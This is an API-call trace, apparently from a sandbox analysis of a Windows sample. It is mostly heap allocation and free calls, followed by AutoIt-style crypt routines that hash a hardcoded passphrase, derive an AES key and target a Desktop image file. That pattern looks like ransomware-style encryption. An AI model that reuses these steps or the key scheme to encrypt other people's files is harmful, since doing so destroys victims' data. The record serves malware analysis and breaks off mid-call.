[0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0121.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0121.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0121.313] FreeLibrary (hLibModule=0x772d0000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0121.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0121.315] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.315] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0121.315] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0121.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0121.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0121.317] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0121.317] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0121.318] CloseHandle (hObject=0x258) returned 1 [0121.318] FreeLibrary (hLibModule=0x772d0000) returned 1 [0121.318] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0121.318] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BbxrQ2nHZPP_A.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32544d0, ftCreationTime.dwHighDateTime=0x1d5e188, ftLastAccessTime.dwLowDateTime=0x95acb310, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x95acb310, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="BbxrQ2nHZPP_A.jpg", cAlternateFileName="BBXRQ2~1.JPG")) returned 0x41ac740 [0121.318] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0121.318] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0121.318] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0121.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0121.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0121.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0121.329] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.330] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0121.330] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.330] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0121.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0121.330] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0121.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0121.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0121.330] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0121.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0121.331] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0121.331] CryptHashData (hHash=0x41ac700, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0121.331] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.331] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0121.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0121.331] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac700, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac740) returned 1 [0121.331] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0121.331] CryptDestroyHash (hHash=0x41ac700) returned 1 [0121.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0121.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0121.331] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0121.332] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0121.332] RtlAllocateHeap 